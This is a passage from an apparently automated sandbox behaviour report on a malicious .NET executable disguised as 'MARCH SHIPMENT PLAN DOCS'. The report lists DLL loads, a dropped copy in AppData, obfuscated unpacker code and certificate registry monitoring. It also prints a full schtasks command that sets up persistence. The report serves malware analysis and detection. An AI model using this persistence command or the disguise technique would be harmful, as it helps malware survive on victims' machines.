Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: MARCH SHIPMENT PLAN DOCS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: MARCH SHIPMENT PLAN DOCS.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: MARCH SHIPMENT PLAN DOCS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: HnGT.pdbSHA256l source: MARCH SHIPMENT PLAN DOCS.exe, PKjWaa.exe.0.dr
Source:	Binary string: HnGT.pdb source: MARCH SHIPMENT PLAN DOCS.exe, PKjWaa.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nXBoW3ckpU9SC4eyo6.cs	.Net Code: boFg3mK9Y9 System.Reflection.Assembly.Load(byte[])
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.2e1f3bc.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.70d0000.3.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 12.2.PKjWaa.exe.2f7f20c.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: MARCH SHIPMENT PLAN DOCS.exe

Static PE information: 0x85188FDE [Thu Oct 4 16:03:42 2040 UTC]

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_02AE469F push edx; retf	0_2_02AE46A2
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_02AE469B push edx; retf	0_2_02AE469E
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_02AE4698 push edx; retf	0_2_02AE469A
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_02AE4658 push edx; retf	0_2_02AE465A
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_02AE4790 push esi; retf	0_2_02AE4792
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_02AE475B push esi; retf	0_2_02AE4762
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_02AE4759 push esi; retf	0_2_02AE475A
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_071BC010 push eax; iretd	0_2_071BC011
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_071BC092 pushfd ; iretd	0_2_071BC095
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_071B1CEE push ds; retf	0_2_071B1CEF
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_0BC11AC5 push FFFFFF8Bh; iretd	0_2_0BC11AC7
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 0_2_0BC119CA push dword ptr [ebx+ebp-75h]; iretd	0_2_0BC119D5
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_02F29C30 push esp; retf 02F4h	10_2_02F29D55
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Code function: 10_2_06F2890D push es; ret	10_2_06F28920
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_0705C010 push eax; iretd	12_2_0705C011
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Code function: 12_2_0BA30A55 push FFFFFF8Bh; iretd	12_2_0BA30A57

Source: MARCH SHIPMENT PLAN DOCS.exe	Static PE information: section name: .text entropy: 7.811889203756963
Source: PKjWaa.exe.0.dr	Static PE information: section name: .text entropy: 7.811889203756963

Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nfoiYwMtQAOK6pF4db.cs	High entropy of concatenated method names: 'F7lKapyNAo', 'JvNKjCBEp4', 'OG8Kqppr9M', 'MKjK7uZl6H', 'n8tKApGijB', 'KjoK52lKBj', 'ur5KFbJ0e2', 'p3YKmVoB3k', 'HkbKf8VbfF', 'A0GK1fIf0r'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, rQenLIqO6c3psvUyRd.cs	High entropy of concatenated method names: 'ToString', 'qa9VHSrKvp', 'WXAVOZDgjh', 'vGkVE3WxiS', 's32VDAbnOZ', 'bsXVGv1O66', 'D0jVihPiZX', 'arWVUWSGgR', 'HDhVWRwby6', 'fnPVy8BsEA'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, om6a3f5O5IPdfXqVw0.cs	High entropy of concatenated method names: 'Bp9Qm4K46l', 'nkCQ1WbsVA', 'RJBtJqIJuW', 'arctNGNwWc', 'SHfQHWENj9', 'HoFQL2HOMP', 'IXTQ4sEZ3d', 'Tr5Qaj28J7', 'UxrQjRlABr', 'FD3QqJxY6d'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, KreSWHNNvDsxiSK6PdV.cs	High entropy of concatenated method names: 'yTAn1rfy6T', 'TrEnz1eaVS', 'bNi0Jy9ELC', 'B2G0Nqm4B0', 'aqe0Z0mYbM', 'uaF0uQEod4', 'fYK0gmXLSB', 'zTR08MmeQJ', 'zBo0Pd1YF5', 'uuU0KrlBtm'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, X9sKVY4SrGCHEjiTSB.cs	High entropy of concatenated method names: 'kqmrMXVO7O', 'xPursIRULi', 'nGMrCkd5u8', 's0irOAryKl', 'vrjrDYra3P', 'Q5ErGoCIcs', 'dVwrUnJqH7', 'jVarWAQilJ', 'enGrxNg1W4', 'OqirHdbI5B'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, rQFiuoFyrPdWsYJsSX.cs	High entropy of concatenated method names: 'H5sBbxjFJj', 'm62BQNfkRk', 'je6BBrhtQI', 'AmUB07lXUr', 'LAJB2r8og4', 'aSdBhrk3Dr', 'Dispose', 'XSUtPPPfvc', 'fkGtKZqmdB', 'Pg3teaafwT'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, IYALM4siSyij1kE7im.cs	High entropy of concatenated method names: 'Vqre9guXLd', 'UHtevANXlm', 'qQDeMNXT47', 'vhmesRaBgt', 'kklebt8rhP', 'grveVjyO8k', 'V9HeQxE7UM', 'KB8etpEhQp', 'bl7eBOGk9O', 'ooJenB04sk'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, lmITPyzH0vvGRuJTF2.cs	High entropy of concatenated method names: 'ROlnvWrcEO', 'mMZnMKYhgF', 'R40nsgTBR6', 'jbYnCZ20J5', 'u4hnOopmjO', 'EfEnDxF7Ne', 'sGtnGySTLi', 'UXBnhv69Yi', 'qV0n6Zra6x', 'v4SnX5DviK'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, Cl2sptK8PqlH18RbIm.cs	High entropy of concatenated method names: 'Dispose', 'fdWNfsYJsS', 'U0ZZO2mUkE', 'FZwMX8HAp3', 'zhIN1TXXQG', 'zJZNzRdCtu', 'ProcessDialogKey', 'hw1ZJwItn6', 'pMUZNKFJA7', 'ExdZZ5wjv2'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, gLtKefNZaY130Hx7qSi.cs	High entropy of concatenated method names: 'ToString', 'sxU0MQrvjR', 'bpO0sX2hei', 'nOR0YLhFxj', 'BiJ0CdW04k', 'YwP0OY29xF', 'FDm0E6d0vS', 'ntF0DDZQrr', 'GYtyM1Lv8pwnHlcZlWy', 'aoq9PKLl327MJUW5viK'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, KbOLHcyNOTSqYWNxKB.cs	High entropy of concatenated method names: 'z5fp61wurY', 'SbOpXfHFEC', 'gM8p3YJu3J', 'kyNp95gKen', 'Vb2pSmk5J7', 'GnRpvUviX1', 'jxHpk2f0Ts', 'VTkpMQ5t6u', 'ODvpsEfCD4', 'IfSpYTs6UR'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, Vwjv2l1ICUc2lH0ZNw.cs	High entropy of concatenated method names: 'wmYneJQlMe', 'OvanlB8ZCo', 'FqgnIGpSwl', 'T71np92mmo', 'Jq9nBIog4H', 's7XncYG0Dw', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, eR2MkENJvpNgTcg6eHy.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nvhnHGPYsO', 'XU3nLg9Bal', 'x1hn4DC1MT', 'DKFnalub6B', 'o3FnjvEyHg', 'v9tnq82G1i', 'bIun7mhfOS'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, qA1OjRUtjDoSpid5ve.cs	High entropy of concatenated method names: 'hiqpPGPuqv', 'Xo1pelhpmT', 'EDxpIRINCK', 'cwtI1wDGLP', 'bw6IzdMvGe', 'MK8pJb5wob', 'JAupNgmV5n', 'RyHpZZ52iB', 'oMwpuCFdg4', 'SP0pg13K58'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, bLDjPRZEAtUr3S7TUf.cs	High entropy of concatenated method names: 'IPa3b5hwW', 'KNN9LfmQA', 'A0xvZx4QB', 'ql5kDXVcd', 'e5SsZPKNH', 'jYpY8QLaA', 'VNB3srfNsJeuEeOrxh', 'w6EN7kHrHHUrT28SU7', 'djXStsUXDqIW8hT3qe', 'R3RtKE6tJ'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nXBoW3ckpU9SC4eyo6.cs	High entropy of concatenated method names: 'xeAu8q7eQZ', 'z8CuPxuVSh', 'qPOuKcNYJG', 'X5LueeKttD', 'F1QulNX5Nx', 'dNeuIra3Gn', 'dl2up8wrNu', 'TZ8ucanxrF', 'm0TuwdMBui', 'EMCudCoCPR'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, BVKRUIC45ZBSWRFHF9.cs	High entropy of concatenated method names: 'PEmI8wZrIP', 'ARGIKOW6MM', 'lrtIlhRo7R', 'vYCIpThO6C', 'qx0IckXCNo', 'awclAZIkGf', 'U8Al5gH70b', 'mQXlFQxgB6', 'nXKlmHfdGB', 'R4KlfCly6Q'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, Ntk4OH7nUKDFSVjdDO.cs	High entropy of concatenated method names: 'YP2Qd9jprD', 'JfsQRysq5C', 'ToString', 'tNCQP4tkHq', 'oinQKQNchR', 'jxJQemQyay', 'TSPQlYI2EY', 'qvUQI7910Z', 'JLgQpbPfbW', 'U4wQcLOLub'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, qNAKxpgTDt25IYVdiH.cs	High entropy of concatenated method names: 'zVrNpfoiYw', 'rQANcOK6pF', 'QiSNdyij1k', 'H7iNRmDkQs', 'cvANbo1vVK', 'mUINV45ZBS', 'xIdSiXx7s5E09t4V3P', 'YqcDAjTu9mOcsuwxYy', 'cooNNSyu2r', 'DirNualy6Z'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, YwItn6fVMUKFJA7sxd.cs	High entropy of concatenated method names: 'HR9BC0uLcH', 'oHNBOX13HE', 'nSxBE9ED1Z', 'PAqBDlFFYT', 'rdyBGiONNS', 'HAHBiLWMqd', 'w3tBUU0A4X', 'MWwBWDyXeM', 'E1WByP91eU', 'RfuBxpr2iB'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, IkQsXfYsVdyp3uvAo1.cs	High entropy of concatenated method names: 't3ZlSoNuOt', 'OVdlk7QXpF', 'SxheEQRU8m', 'MsReD0LUaI', 'oFMeGPgQrt', 'qk4eiqFoRw', 'VCeeUAB9Vq', 'iOYeWVKlS4', 'z3JeyMjfqF', 'kroexm6t7X'

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

File created: C:\Users\user\AppData\Roaming\PKjWaa.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
